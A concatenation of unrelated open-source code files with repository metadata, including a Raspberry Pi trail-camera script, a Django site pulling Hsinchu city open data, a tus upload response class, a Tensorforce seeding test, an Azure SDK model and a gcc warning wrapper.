self.print_list ('pocket_plane_location')
self.print_struc (self.familiar_info, self.familiar_info_desc)
register_format (GAM_V22_Format, signature='GAMEV2.2', extension='GAM', name=('GAM', 'GAME'), type=0x3f5)
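# --- Editor's note: illustrative, not in the original source. ---
# A minimal sketch of loading and dumping a V2.2 save with this class. The
# FileStream import path and its open() call are assumptions about iesh's
# stream helpers, not verified API:
#
#   from infinity.stream import FileStream
#   gam = GAM_V22_Format()
#   gam.read(FileStream().open('BALDUR.GAM'))
#   gam.printme()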
| gpl-2.0 | 2,371,619,244,215,804,400 | 28.877512 | 123 | 0.394818 | false |
jmcallister47/trailcam | night/motion-camera.py | 1 | 1673 | #!/usr/bin/env python
'''Script that manages motion sensor, camera module and light
When motion is detected, turn on infrared light, take and save picture, turn off light
Maximum of one picture every 4 seconds'''
from gpiozero import MotionSensor
import subprocess
from datetime import datetime
from time import sleep
import RPi.GPIO as GPIO
def main():
sensor = MotionSensor(4)
writeToLogFile("STARTED NIGHT MODE AT " + str(datetime.now()))
GPIO.setmode(GPIO.BCM)
GPIO.setup(5, GPIO.OUT) #setup light trigger
while True:
if sensor.motion_detected:
turnOnLights()
print "Lights on"
sleep(1)
takePicture()
print("Take picture")
#sleep(3)
turnOffLights()
print("Turn off lights")
sleep(3)
writeToLogFile("Took one picture at " + str(datetime.now()))
'''Turns on IR Lights indefinitely'''
def turnOnLights():
    GPIO.output(5, 0)  # the light driver is wired active-low: 0 switches it on
'''Turns off all lights (IR and LED)'''
def turnOffLights():
    GPIO.output(5, 1)  # active-low: 1 switches it off
'''Takes a picture and saves it with timestamp'''
def takePicture():
now = datetime.now()
timestamp = str(now.month).zfill(2) + "-" + str(now.day).zfill(2) + "-" + str(now.year) + "-" + \
str(now.hour).zfill(2) + ":" + str(now.minute).zfill(2) + ":" + str(now.second).zfill(2)
filename = timestamp + "-night.jpg"
subprocess.call(["sudo", "raspistill", "-o", "/home/pi/trailcam/tmp/" + filename])
def writeToLogFile(arg):
    with open("/home/pi/trailcam/night/log.txt", "a") as log_file:  # avoid shadowing built-in 'file'
        log_file.write(arg + "\n")
if __name__ == "__main__":
main()
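# --- Editor's note: illustrative, not in the original source. ---
# The zfill-based timestamp assembled in takePicture() is equivalent to the
# more compact strftime form, shown here for reference only:
#
#   datetime.now().strftime("%m-%d-%Y-%H:%M:%S") + "-night.jpg"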
| gpl-3.0 | -4,917,927,044,453,764,000 | 31.803922 | 104 | 0.608488 | false |
kaochiuan/HsinchuCityWebsite | HsinchuCityWebsite/HsinchuCityWebsite/app/views.py | 1 | 19767 | """
Definition of views.
"""
from django.shortcuts import render
from django.http import HttpResponse
from django.http import HttpRequest
from django.template import RequestContext
from datetime import datetime
from datetime import date
from django.http.response import HttpResponse
import urllib.request
import json
import urllib
from urllib.request import Request
from app.models import TempleInfo, TempleManager, CultureActiviyInfo, CityNewsItem, AnamialHospitalReputation
from app.templateModels import *
from django.contrib.sites import requests
from django.views.decorators.csrf import csrf_protect
from django.core import serializers
from app.ReputationService import ReputationService
from django.shortcuts import redirect
def favicon_redirect(request):
return redirect('/static/app/images/favi.ico')
def home(request):
"""Renders the home page."""
assert isinstance(request, HttpRequest)
return render(request,
'app/index.html',
context_instance = RequestContext(request,
{
            'title':'首頁',  # "Home page"
'year':datetime.now().year,
}))
def contact(request):
"""Renders the contact page."""
assert isinstance(request, HttpRequest)
return render(request,
'app/contact.html',
context_instance = RequestContext(request,
{
'title':'Contact',
'message':'Your contact page.',
'year':datetime.now().year,
}))
def about(request):
"""Renders the about page."""
assert isinstance(request, HttpRequest)
return render(request,
'app/about.html',
context_instance = RequestContext(request,
{
            'title':'與Opendata平台同步資料',  # "Synchronize data with the open data platform"
'message':'Application data sync',
'year':datetime.now().year,
}))
def templeMaps(request):
assert isinstance(request, HttpRequest)
regions = TempleInfo.objects.getDistinctRegion()
belief = TempleInfo.objects.getDistinctReligiousBelief()
regionLst = []
beliefLst = []
for r in regions:
regionLst.append(r.locateRegion)
for b in belief:
beliefLst.append(b.religiousBelief)
regionLst = set(regionLst)
beliefLst = set(beliefLst)
return render(request,
'app/templeMaps.html',
context_instance = RequestContext(request,
{
            'title':'求人不如求神',  # roughly: "Better to ask the gods than to ask people"
'regions':regionLst,
'belief':beliefLst,
}))
@csrf_protect
def filterTemple(request):
assert isinstance(request, HttpRequest)
region = request.POST['region']
belief = request.POST['belief']
filterTemples = TempleInfo.objects.filterByDetail(region,belief)
data = serializers.serialize("json", filterTemples, fields=('name','masterGod','address','latitude','longitude'))
decoded = json.loads(data)
return HttpResponse(json.dumps({"status": "Success", "templeInfo": decoded}),
content_type="application/json")
def allMyGodsInHsinchu(request):
assert isinstance(request, HttpRequest)
req = Request("http://opendata.hccg.gov.tw/dataset/480911dd-6eea-4f97-a7e8-334b32cc8f6b/resource/ee12c072-e8aa-4be1-8179-f1c9606198f3/download/20150304091340575.json")
    templeLst = []  # defined before the try so the render below still has a list if the request fails
    try:
        response = urllib.request.urlopen(req)
        ur = response.readall().decode('utf-8-sig')
        j_obj = json.loads(ur)
for jsonObj in j_obj:
address = jsonObj[u"寺廟所在地"]
success, lat, lng = AddressToLatlng(address)
if success == True:
wgs84locate = latlng(lat, lng)
loc = location(address,wgs84locate)
else:
wgs84locate = latlng(0.0, 0.0)
loc = location(address,wgs84locate)
            # Feed keys: 寺廟名稱 = name, 地區 = district, 主祀神像 = main deity,
            # 教別 = religion, 組織型態 = organization type, 寺廟電話 = phone
            g = temple(jsonObj[u"寺廟名稱"],jsonObj[u"地區"],jsonObj[u"主祀神像"],jsonObj[u"教別"],jsonObj[u"組織型態"],loc,jsonObj[u"寺廟電話 1"],jsonObj[u"寺廟電話 2"])
templeLst.append(g)
except urllib.error.HTTPError as e:
print(e.code)
print(e.read().decode("utf-8-sig"))
return render(request,
'app/allmygods.html',
context_instance = RequestContext(request,
{
            'title':'求人不如求神',  # roughly: "Better to ask the gods than to ask people"
'gods':templeLst,
}))
def address_to_location(request):
    assert isinstance(request, HttpRequest)
    address = request.POST.get('address', '')
    lat = 0.0
    lng = 0.0
    if address == "":
        # nothing to geocode; answer with the same shape the success path uses
        return HttpResponse(json.dumps({"status": "Fail", "lat": lat, "lng": lng}),
                            content_type="application/json")
    try:
        success, lat, lng = AddressToLatlng(address)
        if success == True:
            return HttpResponse(json.dumps({"status": "OK", "lat": lat, "lng": lng}),
                                content_type="application/json")
        else:
            return HttpResponse(json.dumps({"status": "Fail", "lat": lat, "lng": lng}),
                                content_type="application/json")
    except urllib.error.HTTPError as e:
        print(e.code)
        print(e.read().decode("utf-8-sig"))
        return HttpResponse(json.dumps({"status": "Fail", "lat": lat, "lng": lng}),
                            content_type="application/json")
def AddressToLatlng(address):
encodeAddress = urllib.parse.urlencode({'address': address})
url = "https://maps.googleapis.com/maps/api/geocode/json?%s" % encodeAddress
req = Request(url)
response = urllib.request.urlopen(req).readall().decode('utf-8')
jsongeocode = json.loads(response)
longitude = 0.0
latitude = 0.0
success = False
if jsongeocode['status'] == "OK":
success = True
latitude = jsongeocode['results'][0]['geometry']['location']['lat']
longitude = jsongeocode['results'][0]['geometry']['location']['lng']
return success, latitude, longitude
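# --- Editor's note: illustrative, not in the original source. ---
# AddressToLatlng relies on this (abridged) Google Geocoding API response
# shape; a real response carries many more fields, and current versions of
# the API additionally require a key parameter on the request URL:
#
#   {"status": "OK",
#    "results": [{"geometry": {"location": {"lat": 24.80, "lng": 120.97}}}]}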
@csrf_protect
def syncTempleInfo(request):
assert isinstance(request, HttpRequest)
req = Request("http://opendata.hccg.gov.tw/dataset/480911dd-6eea-4f97-a7e8-334b32cc8f6b/resource/ee12c072-e8aa-4be1-8179-f1c9606198f3/download/20150304091340575.json")
templeLst = []
success = False
try:
response = urllib.request.urlopen(req)
ur = response.readall().decode('utf-8-sig')
j_obj = json.loads(ur)
for jsonObj in j_obj:
address = jsonObj[u"寺廟所在地"]
success, lat, lng = AddressToLatlng(address)
if success == True:
wgs84locate = latlng(lat, lng)
loc = location(address,wgs84locate)
else:
wgs84locate = latlng(0.0, 0.0)
loc = location(address,wgs84locate)
g = temple(jsonObj[u"寺廟名稱"],jsonObj[u"地區"],jsonObj[u"主祀神像"],jsonObj[u"教別"],jsonObj[u"組織型態"],loc,jsonObj[u"寺廟電話 1"],jsonObj[u"寺廟電話 2"])
templeLst.append(g)
except urllib.error.HTTPError as e:
print(e.code)
print(e.read().decode("utf-8-sig"))
if len(templeLst) > 0:
# sync templeInfo to database
for item in templeLst:
filterResult = TempleInfo.objects.filter_temple(name = item.name, locateRegion = item.locateRegion, masterGod = item.mastergod)
if len(filterResult) == 0:
templeItem = TempleInfo.objects.create_temple(name=item.name, locateRegion=item.locateRegion, religiousBelief=item.religiousBelief,
masterGod=item.mastergod, address=item.location.address, latitude=item.location.latlng.lat,
longitude=item.location.latlng.lng, phone1=item.phone1, phone2=item.phone2)
elif len(filterResult) == 1 and filterResult[0].latitude == 0 and filterResult[0].longitude == 0 :
latitude = item.location.latlng.lat
longitude = item.location.latlng.lng
if latitude != 0 and longitude != 0:
filterResult[0].latitude = latitude
filterResult[0].longitude = longitude
filterResult[0].save()
return HttpResponse(json.dumps({"status": "Success"}),
content_type="application/json")
else:
return HttpResponse(json.dumps({"status": "Fail"}),
content_type = "application/json")
@csrf_protect
def syncCultureInfo(request):
assert isinstance(request, HttpRequest)
req = Request("http://opendata.hccg.gov.tw/dataset/28f1cd76-59b9-4877-b350-b064db635eb8/resource/82c2be17-0593-429b-842b-409735a9860f/download/20151119195903997.json")
activityLst = []
success = False
try:
response = urllib.request.urlopen(req)
ur = response.readall().decode('utf-8-sig')
j_obj = json.loads(ur)
for jsonObj in j_obj:
address = jsonObj[u"地點地址"]
success, lat, lng = AddressToLatlng(address)
if success == True:
wgs84locate = latlng(lat, lng)
loc = location(address,wgs84locate)
else:
wgs84locate = latlng(0.0, 0.0)
loc = location(address,wgs84locate)
            # Feed keys: 活動主題 = theme, 起始日 = start date, 截止日 = end date,
            # 時間 = time, 活動名稱 = name, 地點 = venue, 地點地址 = venue address
            activity = cultureActiviy(jsonObj[u"活動主題"],jsonObj[u"起始日"],jsonObj[u"截止日"],jsonObj[u"時間"],jsonObj[u"活動名稱"],jsonObj[u"地點"],loc)
activityLst.append(activity)
except urllib.error.HTTPError as e:
print(e.code)
print(e.read().decode("utf-8-sig"))
if len(activityLst) > 0:
# sync CultureActiviyInfo to database
for item in activityLst:
filterResult = CultureActiviyInfo.objects.filter_activity(name = item.name,activityTheme = item.activityTheme, locationName = item.locationName,
address = item.location.address, startDate = item.startDate, endDate = item.endDate)
if len(filterResult) == 0:
templeItem = CultureActiviyInfo.objects.create_activity(name=item.name, activityTheme=item.activityTheme,locationName= item.locationName,
address=item.location.address, latitude=item.location.latlng.lat, longitude=item.location.latlng.lng,
startDate = item.startDate, endDate = item.endDate, activityTime = item.time)
elif len(filterResult) == 1 and filterResult[0].latitude == 0 and filterResult[0].longitude == 0 :
latitude = item.location.latlng.lat
longitude = item.location.latlng.lng
if latitude != 0 and longitude != 0:
filterResult[0].latitude = latitude
filterResult[0].longitude = longitude
filterResult[0].save()
return HttpResponse(json.dumps({"status": "Success"}),
content_type="application/json")
else:
return HttpResponse(json.dumps({"status": "Fail"}),
content_type = "application/json")
@csrf_protect
def syncReputationOfAnimalHospital(request):
assert isinstance(request, HttpRequest)
req = Request("http://opendata.hccg.gov.tw/dataset/9055d606-9231-4e67-a8bf-2500d736962d/resource/cbefd6b2-8e1b-4348-8136-085241266c92/download/20150306111824929.json")
response = urllib.request.urlopen(req)
ur = response.readall().decode('utf-8-sig')
ahr = ReputationService(ur)
hos = ahr.get_animal_hospitals() # (success, address, latitude, longitude)
links = ahr.get_hospital_links(hos.keys())
data = ahr.blog_crawler(links)
rep = ahr.get_reputation(hos, data) # name: ((success, address, latitude, longitude), {'positive':score,'negative':score})
jsformat = json.dumps(rep)
repLst = []
for k, v in rep.items():
wgs84locate = latlng(v[0][2], v[0][3])
locateLatlng = location(v[0][1],wgs84locate)
repItem = hospitalReputation(k,locateLatlng,v[1]['positive'],v[1]['negative'])
repLst.append(repItem)
if len(repLst) > 0:
# sync CultureActiviyInfo to database
for item in repLst:
filterResult = AnamialHospitalReputation.objects.filter_reputation(name=item.name,address=item.location.address)
today = date.today()
if len(filterResult) == 0:
templeItem = AnamialHospitalReputation.objects.create_reputation(name=item.name,address=item.location.address,
latitude=item.location.latlng.lat,longitude=item.location.latlng.lng,
postiveScore=item.positiveReputation,negativeScore=item.negativeReputation,
dataDT=today)
elif len(filterResult) == 1:
                if item.location.latlng.lat != 0 and item.location.latlng.lng != 0:  # only overwrite stored coordinates when the fresh geocode succeeded
filterResult[0].latitude = item.location.latlng.lat
filterResult[0].longitude = item.location.latlng.lng
filterResult[0].postiveScore = item.positiveReputation
filterResult[0].negativeScore = item.negativeReputation
filterResult[0].dataDT = today
filterResult[0].save()
return HttpResponse(json.dumps({"status": "Success"}),
content_type="application/json")
@csrf_protect
def syncCityNews(request):
assert isinstance(request, HttpRequest)
req = Request("http://opendata.hccg.gov.tw/dataset/e9443b8a-da93-46a9-b794-49aabbb815fd/resource/0f3f2cb2-2552-44bf-ba08-54dfaafda034/download/20151127133908155.json")
newsLst = []
success = False
try:
response = urllib.request.urlopen(req)
ur = response.readall().decode('utf-8-sig')
j_obj = json.loads(ur)
for jsonObj in j_obj:
            # Feed keys: 發布起始日期 / 發布截止日期 = publish start / end date,
            # 標題 = title, 類別 = category, 內容 = body, 圖片路徑(1) = image path 1
            start = TaiwanDateToStdDate(jsonObj[u"發布起始日期"])
            end = TaiwanDateToStdDate(jsonObj[u"發布截止日期"])
            news = cityNewes(jsonObj[u"標題"],start,end,jsonObj[u"類別"],jsonObj[u"內容"],jsonObj[u"圖片路徑(1)"])
newsLst.append(news)
except urllib.error.HTTPError as e:
print(e.code)
print(e.read().decode("utf-8-sig"))
if len(newsLst) > 0:
# sync CityNewsItem to database
for item in newsLst:
filterResult = CityNewsItem.objects.filter_news(title = item.title, type = item.type, publishDate = item.publishDate, endDate = item.endDate)
if len(filterResult) == 0:
templeItem = CityNewsItem.objects.create_news(title = item.title, type = item.type,content = item.content, publishDate = item.publishDate,
endDate = item.endDate, picturePath = item.picturePath)
elif len(filterResult) == 1 :
filterResult[0].content = item.content
filterResult[0].picturePath = item.picturePath
filterResult[0].save()
return HttpResponse(json.dumps({"status": "Success"}),
content_type="application/json")
else:
return HttpResponse(json.dumps({"status": "Fail"}),
content_type = "application/json")
def cultureActivities(request):
"""Renders the about page."""
assert isinstance(request, HttpRequest)
return render(request,
'app/cultureActivities.html',
context_instance = RequestContext(request,
{
            'title':'當月藝文活動',  # "This month's arts and cultural events"
'year':datetime.now().year,
}))
def cityNews(request):
"""Renders the about page."""
assert isinstance(request, HttpRequest)
return render(request,
'app/cityNews.html',
context_instance = RequestContext(request,
{
            'title':'市府新聞',  # "City government news"
'year':datetime.now().year,
}))
def TaiwanDateToStdDate(dateStr):
return datetime.strptime(dateStr, "%Y%m%d")
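# --- Editor's note: illustrative, not in the original source. ---
# Despite its name, the helper above parses Gregorian "YYYYMMDD" strings,
# e.g. TaiwanDateToStdDate("20151127"). If the feed ever supplied ROC-calendar
# years such as "1041127" for 2015 (an assumption, not something observed in
# this code), 1911 would first have to be added to the year:
#
#   datetime.strptime(str(int(s[:-4]) + 1911) + s[-4:], "%Y%m%d")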
@csrf_protect
def filterCultureActivities(request):
assert isinstance(request, HttpRequest)
keyword = request.POST['keyword']
filterActivities = CultureActiviyInfo.objects.filterByKeyword(keyword)
data = serializers.serialize("json", filterActivities, fields=('name','activityTheme',
'address','latitude','longitude',
'locationName','startDate','endDate','activityTime'))
decoded = json.loads(data)
return HttpResponse(json.dumps({"status": "Success", "activityInfo": decoded}),
content_type="application/json")
@csrf_protect
def getTop10News(request):
assert isinstance(request, HttpRequest)
topNews = CityNewsItem.objects.TopNews()
data = serializers.serialize("json", topNews, fields=('title','type','content',
'publishDate','picturePath'))
decoded = json.loads(data)
return HttpResponse(json.dumps({"status": "Success", "news": decoded}),
content_type="application/json")
@csrf_protect
def searchAnimalHospitalByName(request):
assert isinstance(request, HttpRequest)
name = request.POST['name']
topRputations = AnamialHospitalReputation.objects.filterByName(name)
data = serializers.serialize("json", topRputations, fields=('name','address','latitude','longitude',
'postiveScore','negativeScore','dataDT'))
decoded = json.loads(data)
return HttpResponse(json.dumps({"status": "Success", "reputation": decoded}),
content_type="application/json")
@csrf_protect
def getTop10AnimalHospital(request):
assert isinstance(request, HttpRequest)
topRputations = AnamialHospitalReputation.objects.Top10Hospital()
data = serializers.serialize("json", topRputations, fields=('name','address','latitude','longitude',
'postiveScore','negativeScore','dataDT'))
decoded = json.loads(data)
return HttpResponse(json.dumps({"status": "Success", "reputation": decoded}),
content_type="application/json")
@csrf_protect
def getReputationOfAnimalHospital(request):
assert isinstance(request, HttpRequest)
allRputations = AnamialHospitalReputation.objects.getAll()
data = serializers.serialize("json", allRputations, fields=('name','address','latitude','longitude',
'postiveScore','negativeScore','dataDT'))
decoded = json.loads(data)
return HttpResponse(json.dumps({"status": "Success", "reputation": decoded}),
content_type="application/json")
def animalHospitalReputation(request):
assert isinstance(request, HttpRequest)
return render(request,
'app/animalHospitalReputation.html',
context_instance = RequestContext(request,
{
            'title':'動物醫院評比',  # "Animal hospital ratings"
'year':datetime.now().year,
}))
def memberPerformance(request):
"""Renders the about page."""
assert isinstance(request, HttpRequest)
return render(request,
'app/memberPerformance.html',
context_instance = RequestContext(request,
{
            'title':'議員所提地方建設建議事項',  # "Local development proposals raised by city councilors"
'year':datetime.now().year,
        }))
 | mit | 9,109,989,609,018,349,000 | 41.778022 | 173 | 0.602631 | false |
reinforceio/tensorforce | test/test_seed.py | 1 | 5230 | # Copyright 2020 Tensorforce Team. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import unittest
import numpy as np
from test.unittest_base import UnittestBase
class TestSeed(UnittestBase, unittest.TestCase):
def test_seed(self):
self.start_tests()
states = dict(
int_state=dict(type='int', shape=(2,), num_values=4),
float_state=dict(type='float', shape=(2,), min_value=1.0, max_value=2.0),
)
actions = dict(
int_action=dict(type='int', shape=(2,), num_values=4),
float_action=dict(type='float', shape=(2,), min_value=1.0, max_value=2.0),
)
agent, environment = self.prepare(
states=states, actions=actions, config=dict(
seed=0, device='CPU', eager_mode=True, create_debug_assertions=True,
tf_log_level=20
)
)
print_environment = False
print_agent = False
states = environment.reset()
if print_environment:
print(states['int_state'])
print(states['float_state'])
else:
self.assertTrue(expr=np.allclose(a=states['int_state'], b=np.asarray([2, 3])))
self.assertTrue(expr=np.allclose(
a=states['float_state'], b=np.asarray([1.33350747, 1.92415877])
))
actions = agent.act(states=states)
if print_agent:
print(actions['int_action'])
print(actions['float_action'])
else:
self.assertTrue(expr=np.allclose(a=actions['int_action'], b=np.asarray([0, 0])))
self.assertTrue(expr=np.allclose(
a=actions['float_action'], b=np.asarray([1.5049707, 1.4608247])
))
states, terminal, reward = environment.execute(actions=actions)
updated = agent.observe(terminal=terminal, reward=reward)
if print_environment:
print(states['int_state'])
print(states['float_state'])
print(terminal, reward, updated)
else:
self.assertTrue(expr=np.allclose(a=states['int_state'], b=np.asarray([1, 2])))
self.assertTrue(expr=np.allclose(
a=states['float_state'], b=np.asarray([1.71033683, 1.0078841])
))
self.assertFalse(expr=terminal)
self.assertEqual(first=reward, second=0.6888437030500962)
self.assertFalse(expr=updated)
actions = agent.act(states=states)
if print_agent:
print(actions['int_action'])
print(actions['float_action'])
else:
self.assertTrue(expr=np.allclose(a=actions['int_action'], b=np.asarray([3, 3])))
self.assertTrue(expr=np.allclose(
a=actions['float_action'], b=np.asarray([1.5072203, 1.6714704])
))
states, terminal, reward = environment.execute(actions=actions)
updated = agent.observe(terminal=terminal, reward=reward)
if print_environment:
print(states['int_state'])
print(states['float_state'])
print(terminal, reward, updated)
else:
self.assertTrue(expr=np.allclose(a=states['int_state'], b=np.asarray([1, 3])))
self.assertTrue(expr=np.allclose(
a=states['float_state'], b=np.asarray([1.60039224, 1.58873961])
))
self.assertFalse(expr=terminal)
self.assertEqual(first=reward, second=0.515908805880605)
self.assertFalse(expr=updated)
actions = agent.act(states=states)
if print_agent:
print(actions['int_action'])
print(actions['float_action'])
else:
self.assertTrue(expr=np.allclose(a=actions['int_action'], b=np.asarray([0, 3])))
self.assertTrue(expr=np.allclose(
a=actions['float_action'], b=np.asarray([1.6693485, 1.7339616])
))
states, terminal, reward = environment.execute(actions=actions)
updated = agent.observe(terminal=terminal, reward=reward)
if print_environment:
print(states['int_state'])
print(states['float_state'])
print(terminal, reward, updated)
else:
self.assertTrue(expr=np.allclose(a=states['int_state'], b=np.asarray([1, 0])))
self.assertTrue(expr=np.allclose(
a=states['float_state'], b=np.asarray([1.13346147, 1.98058013])
))
self.assertFalse(expr=terminal)
self.assertEqual(first=reward, second=-0.15885683833831)
self.assertFalse(expr=updated)
| apache-2.0 | 6,577,528,081,546,557,000 | 39.230769 | 92 | 0.585468 | false |
Azure/azure-sdk-for-python | sdk/cognitiveservices/azure-cognitiveservices-language-textanalytics/azure/cognitiveservices/language/textanalytics/models/entity_record.py | 1 | 2689 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class EntityRecord(Model):
"""EntityRecord.
Variables are only populated by the server, and will be ignored when
sending a request.
:param name: Entity formal name.
:type name: str
:param matches: List of instances this entity appears in the text.
:type matches:
list[~azure.cognitiveservices.language.textanalytics.models.MatchRecord]
:param wikipedia_language: Wikipedia language for which the WikipediaId
and WikipediaUrl refers to.
:type wikipedia_language: str
:param wikipedia_id: Wikipedia unique identifier of the recognized entity.
:type wikipedia_id: str
:ivar wikipedia_url: URL for the entity's Wikipedia page.
:vartype wikipedia_url: str
:param bing_id: Bing unique identifier of the recognized entity. Use in
conjunction with the Bing Entity Search API to fetch additional relevant
information.
:type bing_id: str
:param type: Entity type from Named Entity Recognition model
:type type: str
:param sub_type: Entity sub type from Named Entity Recognition model
:type sub_type: str
"""
_validation = {
'wikipedia_url': {'readonly': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'matches': {'key': 'matches', 'type': '[MatchRecord]'},
'wikipedia_language': {'key': 'wikipediaLanguage', 'type': 'str'},
'wikipedia_id': {'key': 'wikipediaId', 'type': 'str'},
'wikipedia_url': {'key': 'wikipediaUrl', 'type': 'str'},
'bing_id': {'key': 'bingId', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'sub_type': {'key': 'subType', 'type': 'str'},
}
def __init__(self, **kwargs):
super(EntityRecord, self).__init__(**kwargs)
self.name = kwargs.get('name', None)
self.matches = kwargs.get('matches', None)
self.wikipedia_language = kwargs.get('wikipedia_language', None)
self.wikipedia_id = kwargs.get('wikipedia_id', None)
self.wikipedia_url = None
self.bing_id = kwargs.get('bing_id', None)
self.type = kwargs.get('type', None)
self.sub_type = kwargs.get('sub_type', None)
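# --- Editor's note: illustrative usage, not part of the generated SDK code. ---
# The model is normally built by the deserializer, but keyword construction
# also works; keys not listed above are simply ignored by the .get() calls:
#
#   record = EntityRecord(name="Seattle", wikipedia_id="Seattle",
#                         wikipedia_language="en", type="Location")
#   assert record.wikipedia_url is None  # read-only; populated by the service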
| mit | 6,033,418,252,891,552,000 | 39.134328 | 78 | 0.612495 | false |
poondog/kangaroo-m7-mkv | scripts/gcc-wrapper.py | 1 | 3884 | #! /usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2011-2012, Code Aurora Forum. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of Code Aurora nor
# the names of its contributors may be used to endorse or promote
# products derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NON-INFRINGEMENT ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# Invoke gcc, looking for warnings, and causing a failure if there are
# non-whitelisted warnings.
import errno
import re
import os
import sys
import subprocess
# Note that gcc uses unicode, which may depend on the locale. TODO:
# force LANG to be set to en_US.UTF-8 to get consistent warnings.
allowed_warnings = set([
"return_address.c:62",
"swab.h:49",
"SemaLambda.cpp:946",
"CGObjCGNU.cpp:1414",
"BugReporter.h:146",
"RegionStore.cpp:1904",
"SymbolManager.cpp:484",
"RewriteObjCFoundationAPI.cpp:737",
"RewriteObjCFoundationAPI.cpp:696",
"CommentParser.cpp:394",
"CommentParser.cpp:391",
"CommentParser.cpp:356",
"LegalizeDAG.cpp:3646",
"IRBuilder.h:844",
"DataLayout.cpp:193",
"transport.c:653",
"xt_socket.c:307",
"xt_socket.c:161",
"inet_hashtables.h:356",
"xc4000.c:1049",
"xc4000.c:1063",
])
# Capture the name of the object file, so we can remove it if a forbidden warning is found.
ofile = None
warning_re = re.compile(r'''(.*/|)([^/]+\.[a-z]+:\d+):(\d+:)? warning:''')
def interpret_warning(line):
"""Decode the message from gcc. The messages we care about have a filename, and a warning"""
line = line.rstrip('\n')
m = warning_re.match(line)
if m and m.group(2) not in allowed_warnings:
print "error, forbidden warning:", m.group(2)
# If there is a warning, remove any object if it exists.
if ofile:
try:
os.remove(ofile)
except OSError:
pass
sys.exit(1)
def run_gcc():
args = sys.argv[1:]
# Look for -o
try:
i = args.index('-o')
global ofile
ofile = args[i+1]
except (ValueError, IndexError):
pass
compiler = sys.argv[0]
try:
proc = subprocess.Popen(args, stderr=subprocess.PIPE)
for line in proc.stderr:
print line,
interpret_warning(line)
result = proc.wait()
except OSError as e:
result = e.errno
if result == errno.ENOENT:
print args[0] + ':',e.strerror
print 'Is your PATH set correctly?'
else:
print ' '.join(args), str(e)
return result
if __name__ == '__main__':
status = run_gcc()
sys.exit(status)
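# --- Editor's note: illustrative, not in the original source. ---
# What warning_re extracts: for a compiler line such as
#   "drivers/foo/bar.c:123:45: warning: unused variable 'x'"
# m.group(2) is "bar.c:123", the key that is checked against allowed_warnings.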
| gpl-2.0 | 3,073,904,154,896,566,300 | 32.482759 | 97 | 0.664779 | false |
alican/django-tus | django_tus/response.py | 1 | 1169 | from django.conf import settings
from django.http import HttpResponse
from django_tus import tus_api_version, tus_api_version_supported, tus_api_extensions
class TusResponse(HttpResponse):
_base_tus_headers = {
'Tus-Resumable': tus_api_version,
'Tus-Version': ",".join(tus_api_version_supported),
'Tus-Extension': ",".join(tus_api_extensions),
'Tus-Max-Size': settings.TUS_MAX_FILE_SIZE,
'Access-Control-Allow-Origin': "*",
'Access-Control-Allow-Methods': "PATCH,HEAD,GET,POST,OPTIONS",
'Access-Control-Expose-Headers': "Tus-Resumable,upload-length,upload-metadata,Location,Upload-Offset",
'Access-Control-Allow-Headers': "Tus-Resumable,upload-length,upload-metadata,Location,Upload-Offset,content-type",
'Cache-Control': 'no-store'
}
    def add_headers(self, headers: dict):
        for key, value in headers.items():
            self[key] = value  # HttpResponse supports item assignment for headers
def __init__(self, extra_headers=None, *args, **kwargs):
super().__init__(*args, **kwargs)
self.add_headers(self._base_tus_headers)
if extra_headers:
self.add_headers(extra_headers)
| mit | -2,560,518,202,457,547,000 | 39.310345 | 122 | 0.655261 | false |
cemagg/sucem-fem | sandbox/flux_calc/plotty.py | 1 | 1219 | from __future__ import division
import pylab
import numpy as np
import run_data
reload(run_data)
def get_unit_gradients(resdict, ind=0, op=lambda x: x):
return dict((k, np.gradient(op(v[ind])))
for k,v in resdict.iteritems())
def get_gradients(resdict, op1=lambda x: x, op2=lambda x: x):
return dict((k, np.gradient(op1(v[1])) / np.gradient(op2(v[0])))
for k,v in resdict.iteritems())
def logify(resdict, op=lambda x: x):
return dict((k, np.log(op(v))) for k,v in resdict.iteritems())
vflux_gradients_unity = get_unit_gradients(run_data.vflux, ind=1,
op=lambda x: np.real(x))
vflux_gradients = get_gradients(run_data.vflux, op1=np.real)
vflux_log = logify(vflux_gradients, op=np.abs)
vflux_log_h = logify(run_data.vflux, op=lambda x: x[0])
pylab.figure(1)
pylab.hold(0)
